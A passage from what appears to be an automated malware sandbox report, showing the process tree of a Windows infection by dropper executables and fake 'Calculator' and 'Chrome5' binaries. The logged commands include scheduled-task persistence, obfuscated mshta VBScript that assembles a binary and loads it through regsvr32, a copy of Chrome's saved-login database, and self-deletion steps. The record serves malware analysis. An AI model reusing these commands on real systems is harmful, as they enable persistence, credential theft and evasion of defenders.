                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=3188 /prefetch:8
                                                                                                                                                        11⤵
                                                                                                                                                          PID:6552
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3228 /prefetch:2
                                                                                                                                                          11⤵
                                                                                                                                                            PID:6620
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=2164 /prefetch:8
                                                                                                                                                            11⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:3940
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=3712 /prefetch:8
                                                                                                                                                            11⤵
                                                                                                                                                              PID:4636
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=1424 /prefetch:8
                                                                                                                                                              11⤵
                                                                                                                                                                PID:7060
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=2044 /prefetch:8
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:2976
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                            8⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4884
                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                              9⤵
                                                                                                                                                                PID:5992
                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:3612
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                      PID:4640
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:4532
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:4120
                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:7092
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:1472
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon174a6c5f1664f.exe
                                                                                                                                                                    Mon174a6c5f1664f.exe
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:3876
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon174a6c5f1664f.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon174a6c5f1664f.exe
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:1340
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:2476
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17332e41e6b.exe
                                                                                                                                                                      Mon17332e41e6b.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:1952
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5745349.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5745349.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:3080
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2903274.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2903274.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:3112
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5952934.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5952934.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        PID:4796
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4864867.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4864867.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4140
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\4864867.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\4864867.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4960
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\4864867.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "" == "" for %c in ( "C:\Users\Admin\AppData\Roaming\4864867.exe" ) do taskkill -IM "%~nxc" -f
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:1188
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe
                                                                                                                                                                                  ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x
                                                                                                                                                                                  10⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:1776
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if ""/PdmLkTgclA1F1vCuy4x"" == """" for %c in ( ""C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:5228
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "/PdmLkTgclA1F1vCuy4x" == "" for %c in ( "C:\Users\Admin\AppData\Local\Temp\FZkDRs9RSZN.Exe" ) do taskkill -IM "%~nxc" -f
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:5392
                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" vbSCriPt: clOSE ( creatEoBjecT ( "wScripT.SheLL").rUn ( "CMD /R EchO | sET /P = ""MZ"" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q + jD6c~d.d + xtSWZV.KD+ KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s " , 0 , True) )
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:5884
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R EchO | sET /P = "MZ" > GGEDXaPF.3N & COPy /y /b GGEDXaPF.3N + OS9L8LWJ.8 + OXk9Xe.U5Q +jD6c~d.d + xtSWZV.KD+ KhEL.5i ..\cKW6.mXo & deL /q *& StArT regsvr32 -u ..\cKW6.mXo -s
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:4984
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:4060
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>GGEDXaPF.3N"
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:5572
                                                                                                                                                                                                  • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                    regsvr32 -u ..\cKW6.mXo -s
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5144
                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                              taskkill -IM "4864867.exe" -f
                                                                                                                                                                                              10⤵
                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                              PID:5604
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\4551418.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\4551418.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:4548
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:4260
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3237548.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3237548.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4788
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:612
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17afe24e0084db3.exe
                                                                                                                                                                                        Mon17afe24e0084db3.exe
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2432
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17afe24e0084db3.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17afe24e0084db3.exe" -u
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:1408
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:380
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1140
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:1996
                                                                                                                                                                                      • C:\Windows\SysWOW64\systray.exe
                                                                                                                                                                                        "C:\Windows\SysWOW64\systray.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Adds policy Run key to start application
                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                        PID:5340
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          /c del "C:\Users\Admin\Pictures\Adobe Films\La5Vy50NmXgdPwbpOCWmV4Qt.exe"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4376
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2780
                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4160
                                                                                                                                                                                            • C:\Program Files (x86)\Mmnuhhz-\1bsdbx4.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Mmnuhhz-\1bsdbx4.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2944
                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2764
                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1884
                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:1440
                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1312
                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1256
                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1120
                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:348
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon173a360b525.exe
                                                                                                                                                                                                            Mon173a360b525.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:1696
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2767069492.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:3308
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2767069492.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\2767069492.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:5108
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2360218836.exe"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:6064
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2360218836.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2360218836.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:5520
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon173a360b525.exe" & exit
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:424
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                    taskkill /im "Mon173a360b525.exe" /f
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:5380
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JOC5V.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JOC5V.tmp\Mon17bbf11fdb575d.tmp" /SL5="$40048,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bbf11fdb575d.exe"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  PID:2148
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bbf11fdb575d.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:3308
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-LAJN3.tmp\Mon17bbf11fdb575d.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-LAJN3.tmp\Mon17bbf11fdb575d.tmp" /SL5="$601DA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bbf11fdb575d.exe" /SILENT
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:3528
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-CEPT3.tmp\postback.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-CEPT3.tmp\postback.exe" ss1
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:3536
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17a0d8ec302e.exe
                                                                                                                                                                                                                  Mon17a0d8ec302e.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:3900
                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k localservice -s W32Time
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:380
                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:2844
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:5588
                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:1672
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:5320
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                      PID:3016
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:3056
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:3684
                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                      PID:6236
                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 748AA7AC01C66A0A235ABB09D4A02BBF C
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:7128
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding C9C4BE3937A89E32BF20B981585F2B8E
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          PID:5984
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:3804
                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding B811BDB8403E46630CE0B77FAE3BF355 E Global\MSI0000
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:6712
                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                          PID:3360
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:6736
                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
